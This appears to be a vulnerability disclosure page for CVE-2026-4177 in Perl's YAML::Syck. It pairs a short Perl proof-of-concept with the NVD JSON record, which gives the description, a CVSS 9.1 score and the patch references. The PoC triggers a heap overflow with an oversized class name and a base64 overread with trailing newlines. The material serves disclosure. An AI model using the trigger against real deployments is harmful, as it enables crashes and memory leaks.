CVE-2026-4177

#!/usr/bin/env perl use strict; use warnings; # CVE-2026-4177 PoC - YAML::Syck Heap Buffer Overflow # This PoC demonstrates the heap buffer overflow when class names exceed 512 bytes use YAML::Syck qw(Dump Load); # Generate a class name longer than 512 bytes to trigger overflow my $long_class_name = 'A' x 600; # Create object with long class name my $obj = bless({data => 'test'}, $long_class_name); eval { # This will trigger the heap buffer overflow in YAML emitter my $yaml = Dump($obj); print "Generated YAML: $yaml\n"; }; if ($@) { print "Error occurred: $@\n"; } # Additional test for base64 decoder boundary issue my $malicious_b64 = 'dGVzdA==' . "\n" x 10; print "\nTesting Base64 decoder boundary issue...\n"; print "Malicious Base64 input: '$malicious_b64'\n"; # This may cause buffer overread my $decoded = eval { Load("data:;base64,$malicious_b64") }; print "Decoded result: $decoded\n" if defined $decoded;

{"cve": {"id": "CVE-2026-4177", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-03-16T23:16:21.543", "lastModified": "2026-03-23T18:17:31.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YAML::Syck versions through 1.36 for Perl has several potential security vulnerabilities including a high-severity heap buffer overflow in the YAML emitter.\n\nThe heap overflow occurs when class names exceed the initial 512-byte allocation.\n\nThe base64 decoder could read past the buffer end on trailing newlines.\n\nstrtok mutated n->type_id in place, corrupting shared node data.\n\nA memory leak occurred in syck_hdlr_add_anchor when a node already had an anchor. The incoming anchor string 'a' was leaked on early return."}, {"lang": "es", "value": "Las versiones de YAML::Syck hasta la 1.36 para Perl tienen varias vulnerabilidades de seguridad potenciales, incluyendo un desbordamiento de búfer de montículo de alta gravedad en el emisor YAML.\n\nEl desbordamiento de montículo ocurre cuando los nombres de clase exceden la asignación inicial de 512 bytes.\n\nEl decodificador base64 podría leer más allá del final del búfer en saltos de línea finales.\n\nstrtok mutó n->type_id in situ, corrompiendo datos de nodo compartidos.\n\nSe produjo una fuga de memoria en syck_hdlr_add_anchor cuando un nodo ya tenía un ancla. La cadena de ancla entrante 'a' se filtró en el retorno anticipado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:toddr:yaml\\:\\:syck:*:*:*:*:*:perl:*:*", "versionEndExcluding": "1.37", "matchCriteriaId": "618F919B-87EA-4A0F-9798-D29206FA3022"}]}]}], "references": [{"url": "https://github.com/cpan-authors/YAML-Syck/commit/e8844a31c8cf0052914b198fc784ed4e6b8ae69e.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Patch"]}, {"url": "https://metacpan.org/release/TODDR/YAML-Syck-1.37_01/changes#L21", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Release Notes"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/16/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}